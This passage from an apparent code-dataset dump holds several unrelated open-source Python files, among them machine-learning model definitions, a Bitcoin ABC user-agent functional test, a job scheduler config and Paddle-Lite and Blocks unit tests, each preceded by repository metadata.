i.e. there are cycles among the layers.
Args:
nodes: A dictionary of {node_id -> node} represents the nodes in the graph.
dependencies: A dictionary of {node_id -> set(child_ids)}
represents the direct dependencies between nodes in the graph.
Returns:
The list of layers sorted based on topological order.
Raises:
CircularDependencyError: When the layers have cyclic dependencies.
"""
node_layers: Dict[str, Set[str]] = {} # map node_id to the layers that depend on it
def find_child_layers(node_id: str) -> Set[str]:
"""For the given node_id, find all layers that depend on it in a depth-first manner.
Build up the node_layers dependency dictionary while traversing so each node is visited
only once.
Note: Python's default recursive depth limit is 1000, which means this algorithm won't
work for pipeline with more than 1000 nodes. However, we can rewrite this using stack if
we run into this limit in practice.
"""
if node_id in node_layers:
return node_layers[node_id]
node_layers[node_id] = set()
# The layer of the current node can also be considered as depending on that node.
# This is to cater for the edge case where all nodes are completely disjoint from each other
# and no dependency graph for layers can be constructed,
# yet the layers still need to be displayed.
node_layer = getattr(nodes[node_id], "layer", None)
if node_layer is not None:
node_layers[node_id].add(node_layer)
# for each child node of the given node_id,
# mark its layer and all layers that depend on it as child layers of the given node_id.
for child_node_id in dependencies[node_id]:
child_node = nodes[child_node_id]
child_layer = getattr(child_node, "layer", None)
if child_layer is not None:
node_layers[node_id].add(child_layer)
node_layers[node_id].update(find_child_layers(child_node_id))
return node_layers[node_id]
# populate node_layers dependencies
for node_id in nodes:
find_child_layers(node_id)
# compute the layer dependencies dictionary based on the node_layers dependencies,
# represented as {layer -> set(parent_layers)}
layer_dependencies = defaultdict(set)
for node_id, child_layers in node_layers.items():
node_layer = getattr(nodes[node_id], "layer", None)
# add the node's layer as a parent layer for all child layers.
# Even if a child layer is the same as the node's layer, i.e. a layer is marked
# as its own parent, toposort still works so we don't need to check for that explicitly.
if node_layer is not None:
for layer in child_layers:
layer_dependencies[layer].add(node_layer)
# toposort the layer_dependencies to find the layer order.
# Note that for string, toposort_flatten will default to alphabetical order for tie-break.
try:
return toposort_flatten(layer_dependencies)
except CircularDependencyError:
logger.warning(
"Layers visualisation is disabled as circular dependency detected among layers."
)
return []
|
torchkit/head/localfc/curricularface.py | sarvex/TFace | 764 | 16412 | <gh_stars>100-1000
from __future__ import print_function
from __future__ import division
import torch
import torch.nn as nn
from torch.nn import Parameter
import math
from torchkit.util.utils import l2_norm
from torchkit.head.localfc.common import calc_logits
class CurricularFace(nn.Module):
""" Implement of CurricularFace (https://arxiv.org/abs/2004.00288)
"""
def __init__(self,
in_features,
out_features,
scale=64.0,
margin=0.5,
alpha=0.1):
""" Args:
in_features: size of each input features
out_features: size of each output features
scale: norm of input feature
margin: margin
"""
super(CurricularFace, self).__init__()
self.in_features = in_features
self.out_features = out_features
self.margin = margin
self.scale = scale
self.alpha = alpha
self.cos_m = math.cos(margin)
self.sin_m = math.sin(margin)
self.threshold = math.cos(math.pi - margin)
self.mm = math.sin(math.pi - margin) * margin
self.kernel = Parameter(torch.Tensor(in_features, out_features))
self.register_buffer('t', torch.zeros(1))
nn.init.normal_(self.kernel, std=0.01)
def forward(self, embeddings, labels):
cos_theta, origin_cos = calc_logits(embeddings, self.kernel)
target_logit = cos_theta[torch.arange(0, embeddings.size(0)), labels].view(-1, 1)
sin_theta = torch.sqrt(1.0 - torch.pow(target_logit, 2))
cos_theta_m = target_logit * self.cos_m - sin_theta * self.sin_m # cos(target+margin)
mask = cos_theta > cos_theta_m
final_target_logit = torch.where(target_logit > self.threshold, cos_theta_m, target_logit - self.mm)
hard_example = cos_theta[mask]
with torch.no_grad():
self.t = target_logit.mean() * self.alpha + (1 - self.alpha) * self.t
cos_theta[mask] = hard_example * (self.t + hard_example)
cos_theta.scatter_(1, labels.view(-1, 1).long(), final_target_logit)
output = cos_theta * self.scale
return output, origin_cos * self.scale
|
test/functional/feature_uaclient.py | syedrizwanmy/bitcoin-abc | 1,266 | 16421 | #!/usr/bin/env python3
# Copyright (c) 2021 The Bitcoin developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test the -uaclientname and -uaclientversion option."""
import re
from test_framework.test_framework import BitcoinTestFramework
from test_framework.test_node import ErrorMatch
from test_framework.util import assert_equal
class UseragentTest(BitcoinTestFramework):
def set_test_params(self):
self.num_nodes = 1
self.setup_clean_chain = True
def run_test(self):
self.log.info("test -uaclientname and -uaclientversion")
default_useragent = self.nodes[0].getnetworkinfo()["subversion"]
expected = "/Bitcoin ABC:"
assert_equal(default_useragent[:len(expected)], expected)
default_version = default_useragent[default_useragent.index(':') + 1:]
default_version = default_version[:default_version.index('/')]
self.restart_node(0, ["-uaclientname=Foo Client"])
foo_ua = self.nodes[0].getnetworkinfo()["subversion"]
expected = f"/Foo Client:{default_version}"
assert_equal(foo_ua[:len(expected)], expected)
self.restart_node(0, ["-uaclientversion=123.45"])
foo_ua = self.nodes[0].getnetworkinfo()["subversion"]
expected = "/Bitcoin ABC:123.45"
assert_equal(foo_ua[:len(expected)], expected)
self.log.info(
"non-numeric version allowed (although not recommended in BIP14)")
self.restart_node(0, ["-uaclientversion=Version Two"])
foo_ua = self.nodes[0].getnetworkinfo()["subversion"]
expected = "/Bitcoin ABC:Version Two"
assert_equal(foo_ua[:len(expected)], expected)
self.log.info("test -uaclient doesn't break -uacomment")
self.restart_node(0, ["-uaclientname=<NAME>",
"-uaclientversion=3000",
"-uacomment=spam bacon and eggs"])
bar_ua = self.nodes[0].getnetworkinfo()["subversion"]
expected = "/Bar Client:3000"
assert_equal(bar_ua[:len(expected)], expected)
assert "spam bacon and eggs" in bar_ua
self.log.info("test -uaclientname max length")
self.stop_node(0)
expected = r"Error: Total length of network version string \([0-9]+\) exceeds maximum length \([0-9]+\)\. Reduce the number or size of uacomments\."
self.nodes[0].assert_start_raises_init_error(
["-uaclientname=" + "a" * 256], expected, match=ErrorMatch.FULL_REGEX)
self.log.info("test -uaclientversion max length")
expected = r"Error: Total length of network version string \([0-9]+\) exceeds maximum length \([0-9]+\)\. Reduce the number or size of uacomments\."
self.nodes[0].assert_start_raises_init_error(
["-uaclientversion=" + "a" * 256], expected, match=ErrorMatch.FULL_REGEX)
self.log.info("test -uaclientname and -uaclientversion max length")
expected = r"Error: Total length of network version string \([0-9]+\) exceeds maximum length \([0-9]+\)\. Reduce the number or size of uacomments\."
self.nodes[0].assert_start_raises_init_error(
["-uaclientname=" + "a" * 128, "-uaclientversion=" + "a" * 128], expected, match=ErrorMatch.FULL_REGEX)
self.log.info(
"test -uaclientname and -uaclientversion invalid characters")
for invalid_char in ['/', ':', '(', ')', '*', '!', '₿', '🏃']:
# for client name
expected = r"Error: -uaclientname \(" + \
re.escape(invalid_char) + r"\) contains invalid characters\."
self.nodes[0].assert_start_raises_init_error(
["-uaclientname=" + invalid_char],
expected, match=ErrorMatch.FULL_REGEX)
# for client version
expected = r"Error: -uaclientversion \(" + \
re.escape(invalid_char) + r"\) contains invalid characters\."
self.nodes[0].assert_start_raises_init_error(
["-uaclientversion=" + invalid_char],
expected, match=ErrorMatch.FULL_REGEX)
# for both
expected = r"Error: -uaclientname \(" + \
re.escape(invalid_char) + r"\) contains invalid characters\."
self.nodes[0].assert_start_raises_init_error(
["-uaclientname=" + invalid_char,
"-uaclientversion=" + invalid_char],
expected, match=ErrorMatch.FULL_REGEX)
if __name__ == '__main__':
UseragentTest().main()
|
apps/jobs/settings/config.py | rainydaygit/testtcloudserver | 349 | 16439 | <gh_stars>100-1000
try:
from public_config import *
except ImportError:
pass
HOST = '0.0.0.0'
PORT = 9038
SERVICE_NAME = 'jobs'
SERVER_ENV = 'prod'
SQLALCHEMY_POOL_SIZE = 10
SQLALCHEMY_POOL_RECYCLE = 3600
JOBS = [
{ # 任务 信用积分每日检查, 每周一到每周五 早上 10:30 分运行
# 检查每个设备的借用日期是否超时 :发送提醒邮件,扣除信用分 1分
'id': 'credit-check-daily', # 任务 id, 唯一
'func': 'apps.jobs.business.jobs:JobsBusiness.credit_check_daily', # 路径
'args': None, # 参数
'trigger': 'cron', # 启动方式, 时间间隔
'day_of_week': 'mon-fri', # 周1 - 周5
'hour': 11, # 早上 11 点
'minute': 30, # 具体分钟数
# 'trigger': 'interval', # 启动方式 时间区间
# 'hours': 10
# 'seconds': 10
},
{
# cidata 数据更新
'id': 'cijob_update', # 任务 id, 唯一
'func': 'apps.extention.business.cidata:CiJobBusiness.update_jenkins_data', # 路径
'args': None, # 参数
'trigger': 'interval', # 启动方式 时间区间
'hours': 10
# 'seconds': 10
},
{
# 定时把redis中的接口调用情况放到数据库中
'id': 'get_statistics_route_job', # 任务 id, 唯一
'func': 'apps.public.daos.public:get_statistics_route_job', # 路径
'args': None, # 参数
'trigger': 'interval', # 启动方式, 时间间隔
'day_of_week': 'mon-fri', # 周1 - 周5
'hour': 3, # 早上 3 点
# 'minute': 5, # 具体分钟数
}
]
|
test/surrogate/test_sk_random_forest.py | Dee-Why/lite-bo | 184 | 16528 | <gh_stars>100-1000
from sklearn.ensemble import RandomForestRegressor
from openbox.utils.config_space import ConfigurationSpace
from openbox.utils.config_space import UniformFloatHyperparameter, \
CategoricalHyperparameter, Constant, UniformIntegerHyperparameter
import numpy as np
from openbox.utils.config_space.util import convert_configurations_to_array
import threading
from joblib import Parallel, delayed
from sklearn.utils.fixes import _joblib_parallel_args
from sklearn.utils.validation import check_is_fitted
from sklearn.ensemble._base import _partition_estimators
def _accumulate_prediction(predict, X, out, lock):
"""
This is a utility function for joblib's Parallel.
It can't go locally in ForestClassifier or ForestRegressor, because joblib
complains that it cannot pickle it when placed there.
"""
prediction = predict(X, check_input=False)
with lock:
if len(out) == 1:
out[0] += prediction
else:
for i in range(len(out)):
out[i] += prediction[i]
def _collect_prediction(predict, X, out, lock):
"""
This is a utility function for joblib's Parallel.
It can't go locally in ForestClassifier or ForestRegressor, because joblib
complains that it cannot pickle it when placed there.
"""
prediction = predict(X, check_input=False)
with lock:
out.append(prediction)
def predictmv(rf, X):
check_is_fitted(rf)
# Check data
X = rf._validate_X_predict(X)
# Assign chunk of trees to jobs
n_jobs, _, _ = _partition_estimators(rf.n_estimators, rf.n_jobs)
print('n_jobs=', n_jobs)
# avoid storing the output of every estimator by summing them here
if rf.n_outputs_ > 1:
y_hat = np.zeros((X.shape[0], rf.n_outputs_), dtype=np.float64)
else:
print('here, rf.n_outputs_=1')
y_hat = np.zeros((X.shape[0]), dtype=np.float64)
# Parallel loop
lock = threading.Lock()
# Parallel(n_jobs=n_jobs, verbose=rf.verbose,
# **_joblib_parallel_args(require="sharedmem"))(
# delayed(_accumulate_prediction)(e.predict, X, [y_hat], lock)
# for e in rf.estimators_)
#
# y_hat /= len(rf.estimators_)
#
# return y_hat
all_y_preds = list()
Parallel(n_jobs=n_jobs, verbose=rf.verbose,
**_joblib_parallel_args(require="sharedmem"))(
delayed(_collect_prediction)(e.predict, X, all_y_preds, lock)
for e in rf.estimators_)
all_y_preds = np.asarray(all_y_preds, dtype=np.float64)
return all_y_preds
def get_cs():
cs = ConfigurationSpace()
n_estimators = UniformIntegerHyperparameter("n_estimators", 100, 1000, default_value=500, q=50)
num_leaves = UniformIntegerHyperparameter("num_leaves", 31, 2047, default_value=128)
max_depth = Constant('max_depth', 15)
learning_rate = UniformFloatHyperparameter("learning_rate", 1e-3, 0.3, default_value=0.1, log=True)
min_child_samples = UniformIntegerHyperparameter("min_child_samples", 5, 30, default_value=20)
subsample = UniformFloatHyperparameter("subsample", 0.7, 1, default_value=1, q=0.1)
colsample_bytree = UniformFloatHyperparameter("colsample_bytree", 0.7, 1, default_value=1, q=0.1)
cs.add_hyperparameters([n_estimators, num_leaves, max_depth, learning_rate, min_child_samples, subsample,
colsample_bytree])
return cs
n_obs = 50
n_new = 5
cs = get_cs()
cs.seed(1)
configs = cs.sample_configuration(n_obs)
new_configs = cs.sample_configuration(n_new)
X = convert_configurations_to_array(configs)
Y = np.random.RandomState(47).random(size=(n_obs,))
pX = convert_configurations_to_array(new_configs)
print('shape of pX', pX.shape)
rf = RandomForestRegressor(random_state=np.random.RandomState(47), n_estimators=3)
rf.fit(X, Y)
preds = rf.predict(pX)
print(preds)
ppp = predictmv(rf, pX)
print('final predict', ppp)
m = np.mean(ppp, axis=0)
v = np.var(ppp, axis=0)
print(m, v)
print(type(m), type(v))
from joblib import effective_n_jobs
print(effective_n_jobs(None))
|
scripts/regression_tests.py | zhangxaochen/Opt | 260 | 16534 | from opt_utils import *
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("-s", "--skip_compilation", action='store_true', help="skip compilation")
args = parser.parse_args()
if not args.skip_compilation:
compile_all_opt_examples()
for example in all_examples:
args = []
output = run_example(example, args, True).decode('ascii')
with open(example + ".log", "w") as text_file:
text_file.write(output)
|
libs/blocks/tests/test_variable_filter.py | dendisuhubdy/attention-lvcsr | 295 | 16570 | <filename>libs/blocks/tests/test_variable_filter.py
from nose.tools import raises
from blocks.bricks import Bias, Linear, Logistic
from blocks.bricks.parallel import Merge
from blocks.filter import VariableFilter
from blocks.graph import ComputationGraph
from blocks.roles import BIAS, FILTER, PARAMETER, OUTPUT
from theano import tensor
def test_variable_filter():
# Creating computation graph
brick1 = Linear(input_dim=2, output_dim=2, name='linear1')
brick2 = Bias(2, name='bias1')
activation = Logistic(name='sigm')
x = tensor.vector()
h1 = brick1.apply(x)
h2 = activation.apply(h1)
h2.name = "h2act"
y = brick2.apply(h2)
cg = ComputationGraph(y)
parameters = [brick1.W, brick1.b, brick2.parameters[0]]
bias = [brick1.b, brick2.parameters[0]]
brick1_bias = [brick1.b]
# Testing filtering by role
role_filter = VariableFilter(roles=[PARAMETER])
assert parameters == role_filter(cg.variables)
role_filter = VariableFilter(roles=[FILTER])
assert [] == role_filter(cg.variables)
# Testing filtering by role using each_role flag
role_filter = VariableFilter(roles=[PARAMETER, BIAS])
assert parameters == role_filter(cg.variables)
role_filter = VariableFilter(roles=[PARAMETER, BIAS], each_role=True)
assert not parameters == role_filter(cg.variables)
assert bias == role_filter(cg.variables)
# Testing filtering by bricks classes
brick_filter = VariableFilter(roles=[BIAS], bricks=[Linear])
assert brick1_bias == brick_filter(cg.variables)
# Testing filtering by bricks instances
brick_filter = VariableFilter(roles=[BIAS], bricks=[brick1])
assert brick1_bias == brick_filter(cg.variables)
# Testing filtering by brick instance
brick_filter = VariableFilter(roles=[BIAS], bricks=[brick1])
assert brick1_bias == brick_filter(cg.variables)
# Testing filtering by name
name_filter = VariableFilter(name='W_norm')
assert [cg.variables[2]] == name_filter(cg.variables)
# Testing filtering by name regex
name_filter_regex = VariableFilter(name_regex='W_no.?m')
assert [cg.variables[2]] == name_filter_regex(cg.variables)
# Testing filtering by theano name
theano_name_filter = VariableFilter(theano_name='h2act')
assert [cg.variables[11]] == theano_name_filter(cg.variables)
# Testing filtering by theano name regex
theano_name_filter_regex = VariableFilter(theano_name_regex='h2a.?t')
assert [cg.variables[11]] == theano_name_filter_regex(cg.variables)
# Testing filtering by application
appli_filter = VariableFilter(applications=[brick1.apply])
variables = [cg.variables[1], cg.variables[8]]
assert variables == appli_filter(cg.variables)
# Testing filtering by application
appli_filter_list = VariableFilter(applications=[brick1.apply])
assert variables == appli_filter_list(cg.variables)
input1 = tensor.matrix('input1')
input2 = tensor.matrix('input2')
merge = Merge(['input1', 'input2'], [5, 6], 2)
merged = merge.apply(input1, input2)
merge_cg = ComputationGraph(merged)
outputs = VariableFilter(
roles=[OUTPUT], bricks=[merge])(merge_cg.variables)
assert merged in outputs
assert len(outputs) == 3
outputs_application = VariableFilter(
roles=[OUTPUT], applications=[merge.apply])(merge_cg.variables)
assert outputs_application == [merged]
@raises(TypeError)
def test_variable_filter_roles_error():
# Creating computation graph
brick1 = Linear(input_dim=2, output_dim=2, name='linear1')
x = tensor.vector()
h1 = brick1.apply(x)
cg = ComputationGraph(h1)
# testing role error
VariableFilter(roles=PARAMETER)(cg.variables)
@raises(TypeError)
def test_variable_filter_applications_error():
# Creating computation graph
brick1 = Linear(input_dim=2, output_dim=2, name='linear1')
x = tensor.vector()
h1 = brick1.apply(x)
cg = ComputationGraph(h1)
VariableFilter(applications=brick1.apply)(cg.variables)
|
utils/models.py | miladalipour99/time_series_augmentation | 140 | 16583 | from tensorflow.keras.models import Model
from tensorflow.keras.layers import Dense, Flatten, Dropout, Input
from tensorflow.keras.layers import MaxPooling1D, Conv1D
from tensorflow.keras.layers import LSTM, Bidirectional
from tensorflow.keras.layers import BatchNormalization, GlobalAveragePooling1D, Permute, concatenate, Activation, add
import numpy as np
import math
def get_model(model_name, input_shape, nb_class):
if model_name == "vgg":
model = cnn_vgg(input_shape, nb_class)
elif model_name == "lstm1":
model = lstm1(input_shape, nb_class)
elif model_name == "lstm":
model = lstm1v0(input_shape, nb_class)
elif model_name == "lstm2":
model = lstm2(input_shape, nb_class)
elif model_name == "blstm1":
model = blstm1(input_shape, nb_class)
elif model_name == "blstm2":
model = blstm2(input_shape, nb_class)
elif model_name == "lstmfcn":
model = lstm_fcn(input_shape, nb_class)
elif model_name == "resnet":
model = cnn_resnet(input_shape, nb_class)
elif model_name == "mlp":
model = mlp4(input_shape, nb_class)
elif model_name == "lenet":
model = cnn_lenet(input_shape, nb_class)
else:
print("model name missing")
return model
def mlp4(input_shape, nb_class):
# <NAME>, <NAME>, <NAME>, "Time Series Classification from Scratch with Deep Neural Networks: A Strong Baseline," Int. Joint Conf. Neural Networks, 2017, pp. 1578-1585
ip = Input(shape=input_shape)
fc = Flatten()(ip)
fc = Dropout(0.1)(fc)
fc = Dense(500, activation='relu')(fc)
fc = Dropout(0.2)(fc)
fc = Dense(500, activation='relu')(fc)
fc = Dropout(0.2)(fc)
fc = Dense(500, activation='relu')(fc)
fc = Dropout(0.3)(fc)
out = Dense(nb_class, activation='softmax')(fc)
model = Model([ip], [out])
model.summary()
return model
def cnn_lenet(input_shape, nb_class):
# <NAME>, <NAME>, <NAME>, and <NAME>, “Gradient-based learning applied to document recognition,” Proceedings of the IEEE, vol. 86, no. 11, pp. 2278–2324, 1998.
ip = Input(shape=input_shape)
conv = ip
nb_cnn = int(round(math.log(input_shape[0], 2))-3)
print("pooling layers: %d"%nb_cnn)
for i in range(nb_cnn):
conv = Conv1D(6+10*i, 3, padding='same', activation="relu", kernel_initializer='he_uniform')(conv)
conv = MaxPooling1D(pool_size=2)(conv)
flat = Flatten()(conv)
fc = Dense(120, activation='relu')(flat)
fc = Dropout(0.5)(fc)
fc = Dense(84, activation='relu')(fc)
fc = Dropout(0.5)(fc)
out = Dense(nb_class, activation='softmax')(fc)
model = Model([ip], [out])
model.summary()
return model
def cnn_vgg(input_shape, nb_class):
# <NAME> and <NAME>, "Very deep convolutional networks for large-scale image recognition," arXiv preprint arXiv:1409.1556, 2014.
ip = Input(shape=input_shape)
conv = ip
nb_cnn = int(round(math.log(input_shape[0], 2))-3)
print("pooling layers: %d"%nb_cnn)
for i in range(nb_cnn):
num_filters = min(64*2**i, 512)
conv = Conv1D(num_filters, 3, padding='same', activation="relu", kernel_initializer='he_uniform')(conv)
conv = Conv1D(num_filters, 3, padding='same', activation="relu", kernel_initializer='he_uniform')(conv)
if i > 1:
conv = Conv1D(num_filters, 3, padding='same', activation="relu", kernel_initializer='he_uniform')(conv)
conv = MaxPooling1D(pool_size=2)(conv)
flat = Flatten()(conv)
fc = Dense(4096, activation='relu')(flat)
fc = Dropout(0.5)(fc)
fc = Dense(4096, activation='relu')(fc)
fc = Dropout(0.5)(fc)
out = Dense(nb_class, activation='softmax')(fc)
model = Model([ip], [out])
model.summary()
return model
def lstm1v0(input_shape, nb_class):
# Original proposal:
# <NAME> and <NAME>, “Long Short-Term Memory,” Neural Computation, vol. 9, no. 8, pp. 1735–1780, Nov. 1997.
ip = Input(shape=input_shape)
l2 = LSTM(512)(ip)
out = Dense(nb_class, activation='softmax')(l2)
model = Model([ip], [out])
model.summary()
return model
def lstm1(input_shape, nb_class):
# Original proposal:
# <NAME> and <NAME>, “Long Short-Term Memory,” Neural Computation, vol. 9, no. 8, pp. 1735–1780, Nov. 1997.
# Hyperparameter choices:
# <NAME> and <NAME>, "Optimal hyperparameters for deep lstm-networks for sequence labeling tasks," arXiv, preprint arXiv:1707.06799, 2017
ip = Input(shape=input_shape)
l2 = LSTM(100)(ip)
out = Dense(nb_class, activation='softmax')(l2)
model = Model([ip], [out])
model.summary()
return model
def lstm2(input_shape, nb_class):
ip = Input(shape=input_shape)
l1 = LSTM(100, return_sequences=True)(ip)
l2 = LSTM(100)(l1)
out = Dense(nb_class, activation='softmax')(l2)
model = Model([ip], [out])
model.summary()
return model
def blstm1(input_shape, nb_class):
# Original proposal:
# <NAME> and <NAME>, “Bidirectional recurrent neural networks,” IEEE Transactions on Signal Processing, vol. 45, no. 11, pp. 2673–2681, 1997.
# Hyperparameter choices:
# <NAME> and <NAME>, "Optimal hyperparameters for deep lstm-networks for sequence labeling tasks," arXiv, preprint arXiv:1707.06799, 2017
ip = Input(shape=input_shape)
l2 = Bidirectional(LSTM(100))(ip)
out = Dense(nb_class, activation='softmax')(l2)
model = Model([ip], [out])
model.summary()
return model
def blstm2(input_shape, nb_class):
ip = Input(shape=input_shape)
l1 = Bidirectional(LSTM(100, return_sequences=True))(ip)
l2 = Bidirectional(LSTM(100))(l1)
out = Dense(nb_class, activation='softmax')(l2)
model = Model([ip], [out])
model.summary()
return model
def lstm_fcn(input_shape, nb_class):
# <NAME>, <NAME>, <NAME>, and <NAME>, “LSTM Fully Convolutional Networks for Time Series Classification,” IEEE Access, vol. 6, pp. 1662–1669, 2018.
ip = Input(shape=input_shape)
# lstm part is a 1 time step multivariate as described in Karim et al. Seems strange, but works I guess.
lstm = Permute((2, 1))(ip)
lstm = LSTM(128)(lstm)
lstm = Dropout(0.8)(lstm)
conv = Conv1D(128, 8, padding='same', kernel_initializer='he_uniform')(ip)
conv = BatchNormalization()(conv)
conv = Activation('relu')(conv)
conv = Conv1D(256, 5, padding='same', kernel_initializer='he_uniform')(conv)
conv = BatchNormalization()(conv)
conv = Activation('relu')(conv)
conv = Conv1D(128, 3, padding='same', kernel_initializer='he_uniform')(conv)
conv = BatchNormalization()(conv)
conv = Activation('relu')(conv)
flat = GlobalAveragePooling1D()(conv)
flat = concatenate([lstm, flat])
out = Dense(nb_class, activation='softmax')(flat)
model = Model([ip], [out])
model.summary()
return model
def cnn_resnet(input_shape, nb_class):
# <NAME>, <NAME>, <NAME>, <NAME>, <NAME>, "Data augmentation using synthetic data for time series classification with deep residual networks," International Workshop on Advanced Analytics and Learning on Temporal Data ECML/PKDD, 2018
ip = Input(shape=input_shape)
residual = ip
conv = ip
for i, nb_nodes in enumerate([64, 128, 128]):
conv = Conv1D(nb_nodes, 8, padding='same', kernel_initializer="glorot_uniform")(conv)
conv = BatchNormalization()(conv)
conv = Activation('relu')(conv)
conv = Conv1D(nb_nodes, 5, padding='same', kernel_initializer="glorot_uniform")(conv)
conv = BatchNormalization()(conv)
conv = Activation('relu')(conv)
conv = Conv1D(nb_nodes, 3, padding='same', kernel_initializer="glorot_uniform")(conv)
conv = BatchNormalization()(conv)
conv = Activation('relu')(conv)
if i < 2:
# expands dimensions according to Fawaz et al.
residual = Conv1D(nb_nodes, 1, padding='same', kernel_initializer="glorot_uniform")(residual)
residual = BatchNormalization()(residual)
conv = add([residual, conv])
conv = Activation('relu')(conv)
residual = conv
flat = GlobalAveragePooling1D()(conv)
out = Dense(nb_class, activation='softmax')(flat)
model = Model([ip], [out])
model.summary()
return model |
lite/tests/unittest_py/pass/test_conv_elementwise_fuser_pass.py | 714627034/Paddle-Lite | 808 | 16600 | <filename>lite/tests/unittest_py/pass/test_conv_elementwise_fuser_pass.py
# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
sys.path.append('..')
sys.path.append('.')
from auto_scan_test import FusePassAutoScanTest, IgnoreReasons
from program_config import TensorConfig, ProgramConfig, OpConfig, CxxConfig, TargetType, PrecisionType, DataLayoutType, Place
import numpy as np
from functools import partial
from typing import Optional, List, Callable, Dict, Any, Set
from test_conv_util import UpdatePaddingAndDilation, ConvOutputSize, ConvTransposeOutputSize
import unittest
import hypothesis
from hypothesis import given, settings, seed, example, assume, reproduce_failure
import hypothesis.strategies as st
class TestConvElementwiseFuse(FusePassAutoScanTest):
def __init__(self, *args, **kwargs):
FusePassAutoScanTest.__init__(self, *args, **kwargs)
self.enable_testing_on_place(
TargetType.ARM, [PrecisionType.FP32],
DataLayoutType.NCHW,
thread=[1, 4])
self.enable_testing_on_place(
TargetType.X86, [PrecisionType.FP32],
DataLayoutType.NCHW,
thread=[1, 4])
opencl_places = [
Place(TargetType.OpenCL, PrecisionType.FP16,
DataLayoutType.ImageDefault), Place(
TargetType.OpenCL, PrecisionType.FP16,
DataLayoutType.ImageFolder),
Place(TargetType.OpenCL, PrecisionType.FP32, DataLayoutType.NCHW),
Place(TargetType.OpenCL, PrecisionType.Any,
DataLayoutType.ImageDefault), Place(
TargetType.OpenCL, PrecisionType.Any,
DataLayoutType.ImageFolder),
Place(TargetType.OpenCL, PrecisionType.Any, DataLayoutType.NCHW),
Place(TargetType.Host, PrecisionType.FP32)
]
self.enable_testing_on_place(places=opencl_places)
def is_program_valid(self,
program_config: ProgramConfig,
predictor_config: CxxConfig) -> bool:
return True
def sample_program_configs(self, draw):
#conv or conv_transpose
Transpose = draw(st.sampled_from([True, False]))
#conv param or conv_transpose param
in_shape = draw(
st.lists(
st.integers(
min_value=3, max_value=128),
min_size=3,
max_size=3))
in_shape = [draw(st.integers(min_value=1, max_value=4))] + in_shape
weight_shape = draw(
st.lists(
st.integers(
min_value=1, max_value=8), min_size=4, max_size=4))
paddings = draw(
st.lists(
st.integers(
min_value=0, max_value=2), min_size=2, max_size=2))
dilations = draw(st.sampled_from([[2, 2]]))
groups = draw(st.sampled_from([1, 2, in_shape[1]]))
padding_algorithm = draw(st.sampled_from(["VALID", "SAME"]))
strides = draw(st.sampled_from([[1, 1], [2, 2]]))
output_padding = draw(
st.sampled_from([[], [
draw(
st.integers(
min_value=0,
max_value=max(strides[0], dilations[0]) - 1)), draw(
st.integers(
min_value=0,
max_value=max(strides[1], dilations[1]) - 1))
]]))
scale_in = draw(st.floats(min_value=0.001, max_value=0.1))
scale_out = draw(st.floats(min_value=0.001, max_value=0.1))
if Transpose:
bias_sample_shape = weight_shape[1] * groups
else:
bias_sample_shape = weight_shape[0]
elementwise_bias_shape = [bias_sample_shape]
conv_out_shape = []
paddings_, dilations_ = UpdatePaddingAndDilation(
in_shape, weight_shape, paddings, dilations, groups,
padding_algorithm, strides)
if Transpose:
assume(in_shape[1] == weight_shape[0])
assume(in_shape[1] % groups == 0) #TODO
if len(output_padding):
assume(output_padding[0] < max(strides[0], dilations_[0]))
assume(output_padding[1] < max(strides[1], dilations_[1]))
conv_out_shape = [in_shape[0], weight_shape[1] * groups]
oh, ow = ConvTransposeOutputSize(in_shape, weight_shape,
dilations_, paddings_, strides)
if len(output_padding):
oh = oh + output_padding[0]
ow = ow + output_padding[1]
conv_out_shape = conv_out_shape + [int(oh), int(ow)]
assume(oh > 0 and ow > 0)
if len(output_padding):
conv_output_h = (oh + output_padding[0] + paddings[0] +
paddings[1] -
(dilations[0] *
(weight_shape[2] - 1) + 1)) / strides[0] + 1
conv_output_w = (oh + output_padding[1] + paddings[0] +
paddings[1] -
(dilations[1] *
(weight_shape[3] - 1) + 1)) / strides[1] + 1
assume(in_shape[2] == (int)(conv_output_h))
assume(in_shape[3] == (int)(conv_output_w))
else:
assume(in_shape[1] == weight_shape[1] * groups)
assume(weight_shape[0] % groups == 0)
conv_out_shape = [in_shape[0], weight_shape[0]]
oh, ow = ConvOutputSize(in_shape, weight_shape, dilations_,
paddings_, strides)
conv_out_shape = conv_out_shape + [int(oh), int(ow)]
assume(oh > 0 and ow > 0)
conv_type = ""
conv_attrs = {}
if Transpose:
conv_type = "conv2d_transpose"
conv_attrs = {
"data_format": 'nchw',
"dilations": dilations,
"padding_algorithm": padding_algorithm,
"groups": groups,
"paddings": paddings,
"strides": strides,
"Scale_in": scale_in,
"Scale_out": scale_out,
"output_size": [],
"output_padding": output_padding
}
else:
conv_type = "conv2d"
conv_attrs = {
"data_format": 'nchw',
"dilations": dilations,
"padding_algorithm": padding_algorithm,
"groups": groups,
"paddings": paddings,
"strides": strides,
"Scale_in": scale_in,
"Scale_out": scale_out
}
conv_op = OpConfig(
type=conv_type,
inputs={"Input": ["input_data"],
"Filter": ["filter_data"]},
outputs={"Output": ["conv_output_data"]},
attrs=conv_attrs)
elementwise_add_op = OpConfig(
type="elementwise_add",
inputs={"X": ["conv_output_data"],
"Y": ["add_bias_data"]},
outputs={"Out": ["output_data"]},
attrs={"axis": 1})
ops = [conv_op, elementwise_add_op]
self.ops = ops
program_config = ProgramConfig(
ops=ops,
weights={
"filter_data": TensorConfig(shape=weight_shape),
"add_bias_data": TensorConfig(shape=elementwise_bias_shape)
},
inputs={"input_data": TensorConfig(shape=in_shape)},
outputs=["output_data"])
return program_config
def sample_predictor_configs(self):
config = CxxConfig()
return self.get_predictor_configs(), [self.ops[0].type], (1e-4, 1e-5)
def add_ignore_pass_case(self):
pass
def test(self, *args, **kwargs):
self.run_and_statis(
quant=False,
max_examples=500,
passes=["lite_conv_elementwise_fuser_pass"])
if __name__ == "__main__":
unittest.main(argv=[''])
|
